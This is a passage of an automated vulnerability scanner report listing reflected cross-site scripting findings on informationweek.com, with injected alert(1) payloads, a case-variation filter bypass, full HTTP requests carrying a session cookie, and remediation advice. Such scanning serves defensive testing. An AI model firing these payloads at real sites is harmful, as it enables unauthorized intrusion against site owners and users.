This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security45130'-alert(1)-'8c5e548a91a/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:46 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:46 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96675
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security45130'-alert(1)-'8c5e548a91a/81784308001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=157966978;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936f5"%20a%3db%20a194305cb4d was submitted in the REST URL parameter 2. This input was echoed as 936f5" a=b a194305cb4d in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security936f5"%20a%3db%20a194305cb4d/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96599
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security936f5" a=b a194305cb4d/81784308001;kvarticleid=;kvauthor=;loc=300;grp=986131323" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87582"><a>d88ea31a30f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/8178430800187582"><a>d88ea31a30f HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/8178430800187582"><a>d88ea31a30f;kvarticleid=;kvauthor=;loc=300;grp=305740501" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f7c</script>f9d4966ec8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/81784308001f1f7c</script>f9d4966ec8a HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30645
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/81784308001f1f7c</script>f9d4966ec8a;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=974634126;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1024'-alert(1)-'c072496dd61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaperf1024'-alert(1)-'c072496dd61/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29918
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/whitepaperf1024'-alert(1)-'c072496dd61/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=365046991;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e48"><script>alert(1)</script>e51799a371e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /44e48"><script>alert(1)</script>e51799a371e/Security HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:32 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:32 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30148
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/44e48"><script>alert(1)</script>e51799a371e/Security;kvarticleid=;kvauthor=;loc=300;grp=163438567" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21fe1'-alert(1)-'9978f316c90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /21fe1'-alert(1)-'9978f316c90/Security HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29918
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/21fe1'-alert(1)-'9978f316c90/Security;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=689967437;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6379a</ScRiPt%20>7a0640fd116 was submitted in the REST URL parameter 2. This input was echoed as 6379a</ScRiPt >7a0640fd116 in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /whitepaper/Security6379a</ScRiPt%20>7a0640fd116 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30071
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security6379a</ScRiPt >7a0640fd116;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=44204016;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b993"%20a%3db%2035613460ad1 was submitted in the REST URL parameter 2. This input was echoed as 9b993" a=b 35613460ad1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/9b993"%20a%3db%2035613460ad1/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30521
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/9b993" a=b 35613460ad1/Attacks-Breaches/secure-managed-web;kvarticleid=;kvauthor=;loc=300;grp=423427692" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15d8b</script><img%20src%3da%20onerror%3dalert(1)>15c1a020ad3 was submitted in the REST URL parameter 2. This input was echoed as 15d8b</script><img src=a onerror=alert(1)>15c1a020ad3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/15d8b</script><img%20src%3da%20onerror%3dalert(1)>15c1a020ad3/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30583
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/15d8b</script><img src=a onerror=alert(1)>15c1a020ad3/Atta;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=560753103;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f005c</ScRiPt%20><a%20b%3dc>e07f4c8aa0f was submitted in the REST URL parameter 3. This input was echoed as f005c</ScRiPt ><a b=c>e07f4c8aa0f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /whitepaper/Security/Attacks-Breachesf005c</ScRiPt%20><a%20b%3dc>e07f4c8aa0f/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:13 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:13 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30557
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... +'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breachesf005c</ScRiPt ><a b=c>e07f4c8aa0f;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=344916633;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55b72"><a>24c8982aa70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breaches55b72"><a>24c8982aa70/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:56 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:56 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30529
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches55b72"><a>24c8982aa70/secure-mana;kvarticleid=;kvauthor=;loc=300;grp=601344112" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8b23"%20a%3db%208ae27ed0b39 was submitted in the REST URL parameter 4. This input was echoed as d8b23" a=b 8ae27ed0b39 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /whitepaper/Security/Attacks-Breaches/d8b23"%20a%3db%208ae27ed0b39 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30273
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a match has been foundfunction checkit(source,rexp,dest){var findstring = new RegExp(rexp);if (findstring.test ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Digital_Library_Welcome_Ad_1x1;key=/Security/Attacks-Breaches/d8b23" a=b 8ae27ed0b39;kvarticleid=;kvauthor=;loc=300;grp=163715225" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43ccc'-alert(1)-'7429a857bd4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches/43ccc'-alert(1)-'7429a857bd4 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:28 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:28 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30349
